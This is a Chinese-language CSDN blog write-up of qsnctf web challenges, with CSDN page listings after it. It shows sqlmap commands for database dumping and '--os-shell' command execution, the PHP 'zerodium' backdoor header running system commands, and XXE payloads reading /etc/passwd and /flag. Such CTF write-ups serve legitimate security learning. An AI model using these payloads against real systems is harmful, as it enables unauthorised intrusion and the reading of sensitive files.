web题解,基础知识巩固(qsnctf)

最新推荐文章于 2024-07-26 00:00:23 发布
最新推荐文章于 2024-07-26 00:00:23 发布
阅读量908 收藏 17
点赞数 8
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z11762/article/details/139221490
版权

1.文章管理系统

1)打开题目,把它页面翻完了,没看懂它有啥用

2)看了看源码,也是一样的,没找到有用的东西

3)想着可能还是在隐藏文件里找,那我就直接用dirsearch扫扫看

4)扫出来三个网址,其中一个有/?id=/etc/issue,估计它可能是跟内部数据库有关,于是想到用sqlmap跑跑看,sqlmap -u +网址/?id=1 --dbs --batch 

5)扫出来果然在里面找到文件,找了之后发现在word里面有文件,打开查看

sqlmap -u +网址/?id=1 -D word --tables --batch

6)接着打开表查看里面内容

sqlmap -u 网址/?id=1 -D word -T --dump --batch

7)结果真发现flag,但是提交后是错的

8)因为题目有提示说是需要命令执行才能拿到flag

这里用到命令

sqlmap -u 网址/?id=1 --os-shell

这也是根据它所给的提示来的

那就需要从其他方面下手,看了大佬的wp才知道这里用到shell

了解一下什么是shell?
shell是一个用 C 语言编写的程序,它是用户使用 Linux 的桥梁。Shell 既是一种命令语言,又是一种程序设计语言。

Shell 是指一种应用程序,这个应用程序提供了一个界面,用户通过这个界面访问操作系统内核的服务。

为什么要学习和使用shell?
Shell属于内置的脚本,程序开发的效率非常高,依赖于功能强大的命令可以迅速地完成开发任务(批处理)语法简单,代码写起来比较轻松,简单易学

注:--os-shell: 这是另一个选项,指示SQLMap在成功利用SQL注入漏洞后打开操作系统(OS)命令外壳(shell)。一旦SQLMap确定目标网站中存在SQL注入漏洞,并成功利用该漏洞获取了系统权限,它将在目标服务器上启动一个命令行外壳,使用户能够在目标系统上执行操作系统命令。

扫完后里面果然有文件输入命令ls打开具体文件

9)照着它一步步打开

10)看到flag,cat /flag打开,最终拿到flag

2.Robots

1)进入环境

2)看了看源码,啥也没有,直接进入Robots.txt,线索来了

3)直接把给的php文件打开flag就在里面,属实没想到它这莫简单

3.黑客终端

1)进入环境

2)一看源码,flag就在里面,过于抽象,被题目骗了

4.EasyMD5

1)打开环境,一开始我以为是基础的文件上传,但看着它两个上传地址就有点好奇了

2)我还是想着传两个木马上去看看,于是就出现下面这样

3)发现会提示不是 pdf格式的文件,还提示文件过大,最后提示你知道MD5碰撞吗?这里需要找两个MD5值相等的pdf文件上传才行。如下

4)上传成功后如下:它会快速闪出一下flag,需要截屏,再写下flag

5.PHP的后门

1)打开环境如下

2)查看源码没啥东西,开始以为是PHP伪协议或是文件包含之类的,但试了下发现都是报错

后面实在想不出来也是去看了其他大佬的wp才知道这里用到一个其他知识点

PHP zerodium后门漏洞,具体如下:

PHP zerodium后门漏洞-CSDN博客

3)然后直接抓包,添加代码执行

User-Agentt:zerodiumsystem("ls /");

4)然后看到有flag文件,再进行查看一下

User-Agentt:zerodiumsystem("cat /flag");

如此便能成功得到flag

5.PHP的XXE

1)打开题目,它有很多介绍,浅看一下,就当学点知识点

2)进来就是一个phpinfo界面,找了找flag,啥也没找到,后面弄了半天还是弄不出来

后面查了才知道这里需要访问simplexml_load_string.php文件,但是没有任何反应

3)那就尝试抓包试试,但是各种改,还是没思路,就去看了看大佬的wp

4)说是要尝试进行命令执行,把它加在后面,尝试运行

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<test>
<name>
&xxe;
</name>
 
</test>

5)发现访问成功,猜想flag文件在根目录下,然后再加下面的命令运行

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///flag">
]>
<test>
<name>
&xxe;
</name>
 
</test>

这里它涉及到simplexml_load_string.php命令

定义和用法
simplexml_load_string() 函数把 XML 字符串载入对象中。

如果失败,则返回 false。

语法
simplexml_load_file(string,class,options,ns,is_prefix)

返回值
返回类 SimpleXMLElement 的一个对象,该对象的属性包含 XML 文档中的数据。如果失败,则返回 false。

mzxf
关注
  • 8
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java开发面试必备基础知识
01-20
面试必备基础知识, 算法 剑指 Offer 题解 Leetcode 题解 算法
西普WEB大部分题解
12-09
通过深入学习和实践这些题解,不仅可以掌握Web安全的基础知识,还能提升分析和解决问题的能力,为网络安全职业生涯打下坚实基础。对于CTF参赛者而言,这份资源能帮助他们快速提升技术水平,提高比赛成绩。同时,对于...
CyBRICS CTF Quals 2019 Web 题解1
08-04
在CyBRICS CTF Quals 2019的Web挑战中,参赛者遇到了一系列涉及前端、后端以及加密解密的问题。以下是针对题目提供的部分解题思路和知识点的详细说明: 1. **Warmup**: - **URL重定向**:这个挑战中,网站最初...
电工学题解:第一章 电路分析基础.doc
11-26
电工学题解:第一章电路分析基础 电路分析基础是电工学的基础,涉及电路的基本概念、定律、分析方法等。电路分析基础是电工学的核心内容,对于电工学的学科具有重要的意义。 1.1 电路的基本概念 电路是由电阻、...
模拟电子技术基础题解
04-30
根据提供的标题、描述和部分上下文内容,“模拟电子技术基础题解”似乎是一份关于模拟电子技术的基础性学习资料或习题解答集。虽然提供的正文部分仅重复提及了PDF文件的创建工具及其官方网站,但我们可以根据这个...
AvaloniaUI的学习
lishuangquan1987的博客
07-25 482
官方中文文档:https://docs.avaloniaui.net/zh-Hans/docs/welcome。
编程学习之路:从零到一的成长指南
KsuferNotes
07-22 437
在当今数字化时代,编程技能已经成为许多人职业发展的重要组成部分。不论你是已经在IT业从业多年的老手,还是刚刚起步的编程新手,这篇博客将带你走过编程学习的每一个重要阶段,从而顺利完成从零到一的华丽转变。
昇思25天学习打卡营第14天|Vision Transformer图像分类
Xavier_F的博客
07-21 646
本案例详细介绍了ViT模型在ImageNet数据集上的训练、验证和推理过程,重点讲解了模型的核心结构和关键概念,如Multi-Head Attention、Transformer Encoder和位置编码等。通过学习此案例,用户将掌握ViT的基本原理以及其在图像分类任务中的应用潜力,为深入研究计算机视觉领域提供了坚实基础。!
从0开始的STM32HAL库学习6
hwq_1229_0525的博客
07-21 353
配置红色框图中的各种配置时钟源选择外部时钟 21.预分频器Prescaler,下面填0,不分频2.计数模式,计数模式选择为向上计数3.自动重装寄存器,自动重装计数器填为10,计数到10后清空并出发中断4.滤波器的频率分频:不使用影子寄存器。
FastAPI(七十一)实战开发《在线课程学习系统》接口开发-- 查看留言
mr~li的博客
07-24 217
梳理后发现,之前在接口设计的时候,有些欠缺,查看留言,是查看单个的留言,查看留言后,对应的留言变成已读状态。那么我们这个都需要传递一个参数,这个参数应该是留言的id。之前FastAPI(七十)实战开发《在线课程学习系统》接口开发--留言功能开发分享了留言开发,这次我们分享查看留言。在之前设计返回状态码的时候,发现状态码有缺失,我们增加下缺失的。3.判断是否是当前用户的留言,或者接受的方是自己。梳理这里的逻辑,这个接口要依赖登录。5.如果已读且回复了,要带回复的内容。以上则是实现查看留言的接口逻辑。
学习华为IPD流程黑话2.0
产品线负责人
07-23 523
管道管理是指根据资源需求(管道需求)尽早地对可获得性资源(管道供给)进行平衡,任何企业做研发、做产品,它的可用资源都是有限的,可以把企业的资源比喻成管道。既是对产品包进行验证,也是内部技能传递的重要环节,同时能为客户带来价值。这个时候就只需要对切片的概念做一下了解就应该可以直接应用了。而且主要做的是 C 语言,Python 也确实没具体用过。并保证在任意时刻产出的研发价值(即出口流量)的最大化,好了,这个话题就不展开来讲了,后续可以单独展开聊聊。评审的对象是新产品的业务计划,而不是产品的开发计划。
DP学习——外观模式
huibin.yun的博客
07-24 194
学而时习之,温故而知新。
学习笔记】无人机系统(UAS)的连接、识别和跟踪(八)-无人机探测与避让(DAA)机制
u011376987的博客
07-21 986
3GPP TS 23.256 技术规范,主要定义了3GPP系统对无人机(UAV)的连接性、身份识别、跟踪及A2X(Aircraft-to-Everything)服务的支持。
后端开发工程师vue2初识的学习
音符犹如代码的博客
07-24 925
快速认识vue
学习笔记---java篇(0723)
m0_70630166的博客
07-23 705
java、数据类型、循环、选择等
学习笔记之Java篇(0725)
最新发布
m0_70630166的博客
07-26 461
比如,我们在公安系统中认为id相同的人就是同一个人、学籍系统中认为学号相同的人就是同一个人。继承只能有一个父类,但是组合可以有多个属性>所以,有人声称“组合优于继承,开发中可以不用继承”,但是,不建议大家走极端。this()调用必须重载的构造方法,避免相同地址初始化代码,但只能在构造方法中用,比企鹅必须位于构造方法的第一句。如果要使用其他包的类,需要使用import,从而在本类中直接通过类名来调用,否则就需要书写类的完整包名和类名。静态初始化块,用于类的初始化操作,初始化静态属性。
昇思25天学习打卡营第17天|LLM-基于MindSpore的GPT2文本摘要
wwt72的博客
07-21 622
> wte 嵌入层:dim[in, out]=[21128, 768] ,即使用了 21128 个词汇,每个词汇映射到一个768 维的向量。层,自注意力机制,用于计算输入序列中不同位置的注意力权重。,多层感知机,用于对自注意力层的输出进行进一步的非线性变换。此次活动的 notebook 只可以连续运行8小时,此次目的也不是性能优化,故此,我将训练数据减少到了1/10,此时的部分输出如下。>> layers h 隐网络结构层:Transformer模型的主体,包含 12 个 GPT2Block。
sklearn基础学习
招风的黑耳CSDN
07-23 691
sklearn,或者更正式地称为scikit-learn,是一个基于Python的开源机器学习库。它建立在NumPy、SciPy和matplotlib之上,提供了简单而有效的工具用于数据挖掘和数据分析。sklearn支持监督学习和无监督学习算法,包括分类、回归、聚类和降维等。
《书生大模型实战营第3期》入门岛 学习笔记与作业:Python 基础知识
shiter编写程序的艺术
07-21 982
python开发简介:【集成开发环境 IDE】python开发简介:【Conda,Pip】虚环境搭建、配置python开发简介:【jupyter notebook】实战配置python开发简介: 编码规范与工程基础实践使用 jupyter hub /lab搭建机器学习工作台使用跨平台的visual studio code 进行python 开发(综合内容老版本)python 开发环境搭建(综合内容老版本)其实Python 的环境配置在所有编程技术栈中是相对简单的,由于conda,pip 的存在。
计算机基础知识与操作题解
本资源是一份关于计算机基本知识和基本操作的考试题集,旨在测试学习者对计算机基础知识的理解。题目涉及了编程语言、计算机...这份试题涵盖了计算机基础理论的多个重要知识点,适合用于巩固和测试学习者的理解程度。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值